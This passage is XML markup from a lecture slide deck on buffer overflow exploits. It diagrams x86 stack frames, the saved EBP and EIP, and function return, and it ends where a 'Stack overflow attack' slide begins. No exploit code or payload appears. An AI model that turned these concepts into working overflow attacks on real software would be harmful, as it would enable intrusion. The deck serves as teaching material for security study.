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18" r:id="rId2"/>
    <p:sldId id="319" r:id="rId3"/>
    <p:sldId id="275" r:id="rId4"/>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="298" r:id="rId6"/>
    <p:sldId id="299" r:id="rId7"/>
    <p:sldId id="300" r:id="rId8"/>
    <p:sldId id="305" r:id="rId9"/>
    <p:sldId id="304" r:id="rId10"/>
    <p:sldId id="302" r:id="rId11"/>
    <p:sldId id="303" r:id="rId12"/>
    <p:sldId id="306" r:id="rId13"/>
    <p:sldId id="307" r:id="rId14"/>
    <p:sldId id="308" r:id="rId15"/>
    <p:sldId id="309" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="287" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="310" r:id="rId20"/>
    <p:sldId id="311" r:id="rId21"/>
    <p:sldId id="312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4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B587612-8DC4-814E-985B-3C0904B797E3}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2/23/16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671243C-0FEA-074D-864D-D5083B7557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90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B685600-8302-5B4B-8A6A-25420A3832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60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3122C3A-0621-EA44-9BA1-9E58D370D877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7899FE0-BCE1-9C45-B364-AD23DF1C5ED7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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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F7B35CD-99BF-C540-9BC8-7C7DA255D080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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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8237071-C493-8948-9C37-2DE9D501E950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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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16BB79B-1073-D54F-BA4F-663BB6A4C7D4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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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AFC070A-8B95-1440-AF52-F64E7AC16D9B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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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9A98BC9-A014-C74D-92DC-C386E167BDEF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1BC913-ED50-2E4E-8AAC-39FFDD0993C2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FC6A92C-66A0-0449-A105-3C405A1B6C78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7DC81D-B7A2-864C-9E44-5F3EE290C542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732CAFD-9809-8D42-82A8-B89381823235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42D2CA6-EC4E-8A49-A86F-A6D4D1C46936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8CD9562-3B22-F64B-95FE-47D8F7B2721C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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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B77B961-E395-5A46-9CDC-C9EF3632C3AD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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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8C6D99E-16C4-F448-9B11-10435A47FBF5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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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1FB22E4-7BD2-B24D-9250-2B683B89FA76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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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930B6AB-C382-C041-821B-91B0E4C76859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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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8AB3912-B475-4D41-81A6-F975552874C6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Push EBP is done by the callee before allocating a new frame for the function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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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31152-3177-4045-AC31-E7BD692B5A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7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75B8C-1785-2845-8214-CAA119A232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9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B726A-29F5-444E-BDE0-2E275B5136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9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0B849-4CE5-3342-9141-DF617FCEDE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7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38734-A5E2-514C-A682-073437917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6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67B00-277B-E748-BEB1-CA21E1FB26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4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88F09-F115-D948-8EDF-748F11B851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6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AEC6D-3C32-A841-95F8-1F953E8D8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2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7BB16-EF05-1242-9FBF-DC5BA93BAE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7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0A079-9230-7249-9324-7B45BE3094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1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B500F-E4E8-8D47-BAA5-6D10BB7297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1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BF41F6F-F583-8344-A7C8-E14183CC7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Buffer Overflow Exploits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B31152-3177-4045-AC31-E7BD692B5A2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75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Returning from a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46082" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28681" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="5629275"/>
            <a:ext cx="20574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release the function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s frame and restore the saved EBP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46085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8580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691AA83-5D44-6B43-86BC-DD88FDF0A3DF}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46086" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46091" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="29718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Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46093" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46094" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46095" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46096" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46097" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3810000"/>
              <a:ext cx="2971800" cy="439681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46098" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46099" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46100" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3966029"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46101" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="4194629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2" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46103" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23586" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6395200" y="3047546"/>
              <a:ext cx="2973261" cy="7616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800" smtClean="0"/>
                <a:t>local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46105" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="3784600"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46087" name="Right Arrow 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4572000"/>
            <a:ext cx="3048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4953000" y="5497513"/>
            <a:ext cx="993775" cy="369887"/>
            <a:chOff x="4953000" y="2895600"/>
            <a:chExt cx="993897" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46089" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4953000" y="2895600"/>
              <a:ext cx="6431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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46090" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5479181" y="3087624"/>
              <a:ext cx="4677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Returning from a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48130" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28680" name="AutoShape 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="48131" idx="2"/>
            <a:endCxn id="48130" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="1972468" y="3171032"/>
            <a:ext cx="2112963" cy="2247900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -10819"/>
              <a:gd name="adj2" fmla="val 66102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1" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="5629275"/>
            <a:ext cx="20574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release control to the caller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48134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8580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23903A7-584B-DD43-8979-81789E2612AC}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48135" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48145" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="29718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6" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48147" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48148" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48149" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48150" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48151" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3810000"/>
              <a:ext cx="2971800" cy="439681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48152" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125"/>
              <a:ext cx="2971800" cy="439681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48153" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48154" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="4403252"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48155" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="4631852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6" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48157" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48158" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3048000"/>
              <a:ext cx="2971800" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48136" name="Right Arrow 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="3124200"/>
            <a:ext cx="3048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8137" name="Group 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="5497513"/>
            <a:ext cx="993775" cy="369887"/>
            <a:chOff x="4953000" y="2895600"/>
            <a:chExt cx="993897" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48143" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4953000" y="2895600"/>
              <a:ext cx="6431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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48144" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5479181" y="3087624"/>
              <a:ext cx="4677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228600" y="4343400"/>
            <a:ext cx="2743200" cy="2514600"/>
            <a:chOff x="381000" y="4343400"/>
            <a:chExt cx="2590801" cy="2133600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48140" name="Cloud Callout 47"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="381000" y="4931979"/>
              <a:ext cx="2302934" cy="1545021"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 56093"/>
                <a:gd name="adj2" fmla="val -136944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/>
                <a:t>A buffer overflow on stack can change this control flow</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="48141" name="Straight Connector 49"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="2362200" y="4343400"/>
              <a:ext cx="609600" cy="1524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42" name="Straight Connector 50"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="2362201" y="4343400"/>
              <a:ext cx="609600" cy="1524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8139" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6829425" y="4495800"/>
            <a:ext cx="4619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&lt;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Stack overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50178" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
